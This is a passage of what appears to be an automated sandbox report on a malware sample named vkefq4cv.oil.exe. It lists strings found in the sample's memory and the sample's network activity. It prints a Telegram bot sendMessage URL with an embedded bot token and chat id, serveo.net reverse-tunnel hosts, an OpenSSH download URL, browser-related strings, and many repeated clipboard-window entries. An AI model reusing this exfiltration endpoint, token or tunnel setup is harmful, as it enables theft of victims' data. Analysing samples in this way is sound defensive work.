                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.se
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
                  Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net
                  Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net/
                  Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
                  Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
